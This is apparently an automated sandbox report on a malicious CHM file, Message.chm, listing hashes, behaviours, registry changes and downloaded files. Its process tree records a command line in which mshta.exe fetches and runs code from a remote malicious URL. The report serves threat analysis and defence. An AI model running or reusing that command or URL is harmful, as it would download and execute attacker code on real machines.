Analysis
- Max time kernel: 120s
- Max time network: 146s
- Platform: windows10-2004_x64
- Resource: win10v2004-20230220-en
- Resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
- Submitted: 21-03-2023 23:32
Behavioral tasks (task: sample, resource)
- behavioral1: LG유플러스_이동통신_202208_이_선.html, win7-20230220-en
- behavioral2: LG유플러스_이동통신_202208_이_선.html, win10v2004-20230220-en
- behavioral3: LG유플러스_이동통신_202208_이_선.html.lnk, win7-20230220-en
- behavioral4: LG유플러스_이동통신_202208_이_선.html.lnk, win10v2004-20230220-en
- behavioral5: MAIL_20230125151802.chm, win7-20230220-en
- behavioral6: MAIL_20230125151802.chm, win10v2004-20230221-en
- behavioral7: Message.chm, win7-20230220-en
- behavioral8: Message.chm, win10v2004-20230220-en
- behavioral9: Message.chm, win7-20230220-en
- behavioral10: Message.chm, win10v2004-20230220-en
General
- Target: Message.chm
- Size: 23KB
- MD5: a2a8094933150e18fb31f24b5e20643b
- SHA1: e4a2958358b33ad814828efeaa6295eb46510599
- SHA256: c529b6e0b012d8246f9f2720f72253d8d52a1a58f2ee3db32128b2a96c813b9a
- SHA512: 24b43e8452d0b0fc76cb60e6c99e2537c7038ab6808f48ce1578733f1b39e53cffd2a437338ecbcec43944b6331a08657918cb6cfdbaa89db6c2e85ebdf0a6c9
- SSDEEP: 384:2yOvnvzjch5duuyTvBLalWcOrFETyshkB+6tBUMk0zpU:2yOvnbwhv+v1rc4FE+shq+67ZpU
Malware Config
- Extracted URL: http://attiferstudio.com/install.bak/sony/7.html
Signatures
- Blocklisted process makes network request (1 IoC)
  Processes (flow, pid, process):
    25, 388, mshta.exe
- Modifies Internet Explorer settings
  Processes (description, ioc, process):
    Key created, \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\Main, hh.exe
    Set value (int), \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\Main\OperationalData = "525", hh.exe
- Suspicious use of SetWindowsHookEx (2 IoCs)
  Processes (pid, process):
    1120, hh.exe
    1120, hh.exe
- Suspicious use of WriteProcessMemory (2 IoCs)
  Processes (description, pid, process, target process):
    PID 1120 wrote to memory of 388, 1120, hh.exe, mshta.exe
    PID 1120 wrote to memory of 388, 1120, hh.exe, mshta.exe
- Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
- Uses Volume Shadow Copy WMI provider
  The Volume Shadow Copy service is used to manage backups/snapshots.
- Uses Volume Shadow Copy service COM API
  The Volume Shadow Copy service is used to manage backups/snapshots.
Processes (process tree)
- C:\Windows\hh.exe
  Command line: "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\Message.chm
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\mshta.exe (child of hh.exe)
    Command line: "C:\Windows\System32\mshta.exe" http://attiferstudio.com/install.bak/sony/7.html ,
    - Blocklisted process makes network request
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YYL8D8JJ\INISAFEMailv4[1].cab
  Filesize: 2.2MB
  MD5: 8abb4e13ee3f94df4b5e276ef6cb0144
  SHA1: 819db68fcd5a8673383c82898b729f16b77054d2
  SHA256: c0eee87ea1144be28d12e5af7a3307c6a690029bef1e7b43ca08aa8fde0f2c61
  SHA512: f9bbb330cf5615cefed666c84010b685feb4f8cc7e36c1044e57a22b2a5fc7bd4a922157bc9acdfe49629d7bff0eaec6cfd336a2732a25cb895c574a2c2ea930
- C:\Users\Admin\AppData\Local\Temp\ICD1.tmp\INISAFEMailv4.inf
  Filesize: 538B
  MD5: 10418288c546673054c4bd83220ffeef
  SHA1: b179588f320e234899a101ecd651bd024569d8bc
  SHA256: eff48ef0b99ff404fed484df294d18018c5be12fcc7d2d778c18fd0d01c07971
  SHA512: a96a226821148090c1de744552a3d26c858070cb4ee60c508bf29ef9ff302a85bcfd23c7fbd10c8f9c5871e43f6ff1919e2a9e08c05e7c6127943b485ba6b160